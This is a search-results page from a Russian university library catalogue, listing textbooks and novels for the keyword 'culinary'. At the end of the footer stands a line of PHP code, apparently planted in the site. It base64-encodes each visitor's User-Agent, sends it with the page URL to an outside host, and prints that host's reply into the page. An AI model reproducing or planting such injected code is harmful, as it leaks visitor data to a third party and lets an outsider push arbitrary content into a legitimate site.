Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

93 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=КУЛИНАРНЫЙ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 35
1. 
Барбери, Мюриель. Лакомство [Текст] : роман / Мюриель Барбери ; пер. с фр. Н. Хотинской, 2012. - 156, [1] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
2. 
Торопова Н. Д. Организация производства на предприятиях общественного питания [Текст] : учебное пособие / Н. Д. Торопова, 2010. - 411 с.

Учебное пособие по дисциплине "Организация производства на предприятиях общественного питания" состоит из двух частей. В теоретической части показаны современные направления развития общественного питания, даны характеристики основных типов предприятий и подробное описание организации работы их цехов и подразделений.

В отдельных главах рассмотрены вопросы организации снабжения и складского хозяйства, оперативного планирования и нормирования труда работников. В конце каждого раздела приведены вопросы для блицопроса с целью самоконтроля и закрепления учебного материала.

Во вторую часть пособия включен материал для проведения практических занятий по темам курса.

Пособие предназначено для студентов средних специальных учебных заведений, студентов вузов по специальности "Технология приготовления пиши", преподавателей и практических работников общепита.

3. 
Радченко Л. А. Организация производства на предприятиях общественного питания [Текст] : учеб. для студ. образоват. учреждений сред. проф. образования / Л. А. Радченко, 2009. - 374 с.
Держатели документа (Информация об экземплярах) 
4. 
Радченко Л. А. Организация производства на предприятиях общественного питания [Текст] : учеб. для студ. образоват. учреждений сред. проф. образования / Л. А. Радченко, 2007. - 374 с.
Держатели документа (Информация об экземплярах) 
5. 
Мрыхина Е. Б. Организация производства на предприятиях общественного питания [Текст] / Е. Б. Мрыхина, 2013. - 176 с.
Ключевые слова 
ПИТАНИЕ ОБЩЕСТВЕННОЕ -- СНАБЖЕНИЕ -- ХОЗЯЙСТВО СКЛАДСКОЕ -- ХРАНЕНИЕ ПРОДУКТОВ -- ОТПУСК ПРОДУКТОВ -- ПЛАНИРОВАНИЕ ПРОИЗВОДСТВА -- МЕНЮ -- ДОКУМЕНТАЦИЯ НОРМАТИВНАЯ -- ОРГАНИЗАЦИЯ ТРУДА НАУЧНАЯ -- НОРМИРОВАНИЕ ТРУДА -- ОРГАНИЗАЦИЯ ПРОИЗВОДСТВА -- ЦЕХ ЗАГОТОВОЧНЫЙ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ МЯСО-РЫБНЫЙ -- ЦЕХ КУЛИНАРНЫЙ -- ЦЕХ КОНДИТЕРСКИЙ -- ЦЕХ ДОРАБОТКИ ПОЛУФАБРИКАТОВ -- ЦЕХ ОБРАБОТКИ ЗЕЛЕНИ -- ЦЕХ ХОЛОДНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ПОСУДОМОЕЧНАЯ -- ХЛЕБОРЕЗКА -- РЕАЛИЗАЦИЯ ПРОДУКЦИИ
Держатели документа (Информация об экземплярах) 
6. 
Гилберт, Элизабет. Кулинарная книга моей прабабушки [Текст] / Э. Гилберт, М. Я. Поттер ; пер. Ю. Змеева, 2014. - 332, [3] с.
Держатели документа (Информация об экземплярах) 
7. 
Радченко Л. А. Организация производства на предприятиях общественного питания [Текст] / Л. А. Радченко, 2009. - 374 с.
Держатели документа (Информация об экземплярах) 
8. 
О'Рейлли, Брайан. Анжелина и холостяки [Текст] / Б. О'Рейлли, 2014. - 382, [1] с.
Держатели документа (Информация об экземплярах) 
9. 
Мальгина С. Ю. Организация работы структурного подразделения предприятий общественного питания [Текст] / С. Ю. Мальгина, Ю. Н. Плешкова, 2014. - 320 с.
Ключевые слова 
ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ -- ПОКАЗАТЕЛИ ПРОИЗВОДСТВА -- ПРОГРАММА ПРОИЗВОДСТВЕННАЯ -- ПЛАН ТОВАРООБОРОТА -- ТОВАРООБОРОТ - ОБЩЕСТВЕННОЕ ПИТАНИЕ -- ВЫПУСК ПРОДУКЦИИ -- РЕАЛИЗАЦИЯ ПРОДУКЦИИ -- МОЩНОСТЬ ПРОИЗВОДСТВЕННАЯ -- ЭФФЕКТИВНОСТЬ ПРЕДПРИЯТИЯ -- ЗАТРАТЫ ПРЕДПРИЯТИЯ -- ПРИБЫЛЬ ПРОИЗВОДСТВА -- РЕНТАБЕЛЬНОСТЬ ПРЕДПРИЯТИЯ -- ОРГАНИЗАЦИЯ ПРОИЗВОДСТВА - ОБЩЕСТВЕННОЕ ПИТАНИЕ -- ЦЕХ ПРОИЗВОДСТВЕННЫЙ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ МЯСНОЙ -- ЦЕХ РЫБНЫЙ -- ЦЕХ ПТИЦЕГОЛЬЕВОЙ -- ЦЕХ МЯСО-РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- ЦЕХ КУЛИНАРНЫЙ -- ЦЕХ КОНДИТЕРСКИЙ -- ЦЕХ МУЧНЫХ ИЗДЕЛИЙ -- ЛИНИЯ РАЗДАТОЧНАЯ -- РАЗДАТОЧНАЯ -- ОРГАНИЗАЦИЯ РАБОТЫ -- КОЛЛЕКТИВ ТРУДОВОЙ -- ОБУЧЕНИЕ ПЕРСОНАЛА -- ОХРАНА ТРУДА - ОБЩЕСТВЕННОЕ ПТИАНИЕ -- БЕЗОПАСНОСТЬ ПРОДУКЦИИ ПИЩЕВОЙ -- КАЧЕСТВО ПРОДУКЦИИ КОНДИТЕРСКОЙ -- ДОКУМЕНТИРОВАНИЕ УПРАВЛЕНЧЕСКОЙ ДЕЯТЕЛЬНОСТИ -- ПИТАНИЕ ОБЩЕСТВЕННОЕ - ДОКУМЕНТЫ -- ПИТАНИЕ ОБЩЕСТВЕННОЕ - УЧЕТ
Держатели документа (Информация об экземплярах) 
10. 
Мрыхина Е. Б. Организация производства на предприятиях общественного питания [Текст] : учеб. пособие для студ. сред. проф. образования / Е. Б. Мрыхина, 2007. - 176 с.
Ключевые слова 
ПИТАНИЕ ОБЩЕСТВЕННОЕ -- СНАБЖЕНИЕ -- ХОЗЯЙСТВО СКЛАДСКОЕ -- ХРАНЕНИЕ ПРОДУКТОВ -- ОТПУСК ПРОДУКТОВ -- ПЛАНИРОВАНИЕ ПРОИЗВОДСТВА -- МЕНЮ -- ДОКУМЕНТАЦИЯ НОРМАТИВНАЯ -- ОРГАНИЗАЦИЯ ТРУДА НАУЧНАЯ -- НОРМИРОВАНИЕ ТРУДА -- ОРГАНИЗАЦИЯ ПРОИЗВОДСТВА -- ЦЕХ ЗАГОТОВОЧНЫЙ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ МЯСО-РЫБНЫЙ -- ЦЕХ КУЛИНАРНЫЙ -- ЦЕХ КОНДИТЕРСКИЙ -- ЦЕХ ДОРАБОТКИ ПОЛУФАБРИКАТОВ -- ЦЕХ ОБРАБОТКИ ЗЕЛЕНИ -- ЦЕХ ХОЛОДНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ПОСУДОМОЕЧНАЯ -- ХЛЕБОРЕЗКА -- РЕАЛИЗАЦИЯ ПРОДУКЦИИ
Держатели документа (Информация об экземплярах) 
11. 
Чепурной И. П. Идентификация и фальсификация продовольственных товаров [Текст] : учеб. / И. П. Чепурной , 2007. - 459 с.
Держатели документа (Информация об экземплярах) 
12. 
Мейл, Питер. Путешествие с вилкой и штопором [Текст] : роман / Питер Мейл ; пер. с англ. И. П. Пандер, 2009. - 234, [2] с.
Держатели документа (Информация об экземплярах) 
13. 
Похлебкин, Вильям Васильевич. Кулинарный словарь [Текст] / В. В. Похлебкин, 1994. - 446, [1] с.
14. 
Тимофеева, Валентина Афанасьевна. Товароведение продовольственных товаров [Текст] : Учеб. пособие для образоват. учреждений сред. и проф. образования по специальности 0612 "Товароведение" / В. А. Тимофеева, 2002. - 447 с.
Ключевые слова 
ПРОДОВОЛЬСТВЕННЫЕ ТОВАРЫ -- КОНДИТЕРСКИЕ ТОВАРЫ -- МОЛОЧНЫЕ ТОВАРЫ -- ПИЩЕВЫЕ ЖИРЫ -- МЯСНЫЕ ПРОДУКТЫ -- ЯИЧНЫЕ ТОВАРЫ -- РЫБНЫЕ ТОВАРЫ -- ВКУСОВЫЕ ТОВАРЫ -- ПЛОДООВОЩЫЕ ТОВАРЫ -- ЗЕРНО -- ПИЩЕВЫЕ КОНЦЕНТРАТЫ -- ПРИПРАВА -- ЧАЙ -- КОФЕ -- НАПИТОК чайный -- ПРЯНОСТИ -- ТАБАК -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- Крахмал -- Сахар -- Мед -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- МОЛОКО -- Мороженое -- СЫР -- ЖИР пищевой -- Масло растительное -- Маргарин -- Жир кулинарный -- МЯСО -- ЯЙЦЕПРОДУКТЫ -- Концентрат пищевой -- РЫБА

В книге рассматриваются основные вопросы товароведения продовольственных товаров в современных условиях; приведены необходимые <продавцу> и <товароведу> сведения по всем группам <товаров>, а также по вопросам <стандартизации> и <сертификации>, информационному обеспечению, которые позволят работникам торговли принимать квалифицированные решения в <коммерческой деятельности>.

15. 
Стил Л. Я - женщина [Текст] : соврем. энцикл. женщины / Л. Стил, 2002. - 510 с.
Ключевые слова 
ЭНЦИКЛОПЕДИЯ -- СОВРЕМЕННАЯ -- красота -- ЗДОРОВЬЕ -- РЕЦЕПТЫ -- СПОРТ -- диета -- ЭТИКЕТ -- СТИЛЬ -- ОДЕЖДА -- прическа -- макияж -- аксессуары -- РЕЧЕВОЙ -- БИЗНЕС -- ДЕЛОВОЙ -- РАБОТА -- знакомство -- МУЖЧИНА -- БРАК -- СЕМЬЯ -- ИЗМЕНА -- КОНФЛИКТ -- СЕКС -- ТЕСТ -- контрацепция -- беременность -- РЕБЕНОК -- НОВОРОЖДЕННЫЙ -- ДЕТИ -- ДОШКОЛЬНИК -- ПОДРОСТКИ -- ВОСПИТАНИЕ -- ДОМ -- кухня -- ЦВЕТЫ -- комнатный -- растение -- кройка -- шитье -- МОДЕЛИРОВАНИЕ -- вязание -- макраме -- бисероплетение -- кулинарный -- ПРАЗДНИК -- подарок -- гороскоп
Держатели документа (Информация об экземплярах) 
16. 
Товароведение и экспертиза пищевых жиров, молока и молочных продуктов [Текст] : Учебник гриф-УМО / под ред. М. С. Касторных, 2003. - 288 с.
Держатели документа (Информация об экземплярах) 
17. 
Радченко Л. А. Организация производства на предприятиях общественного питания [Текст] : учеб. для студ. образоват. учреждений сред. проф. образования / Л. А. Радченко, 2005. - 347 с.
Держатели документа (Информация об экземплярах) 
18. 
Организация производства на предприятиях общественного питания [Текст] : Учеб. пособие для студ. учеб. заведений сред. проф. образования / Авт.-сост. Л. А. Радченко; Под ред. С. Н. Белоусовой, 2001. - 345 с.
Держатели документа (Информация об экземплярах) 
19. 
Чепурной, И. П. Идентификация и фальсификация продовольственных товаров [Текст] : учебник / И. П. Чепурной, 2002. - 460 с.
Держатели документа (Информация об экземплярах) 
20. 
Организация производства на предприятиях общественного питания [Текст] : Учеб. пособие для учеб. заведений сред. проф. образования и учеб. заведений начал. проф. образования / Под ред. Белоусовой С. Н., 2000. - 345 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2994 - 21.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.02 с.12 запросов, 0.62c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;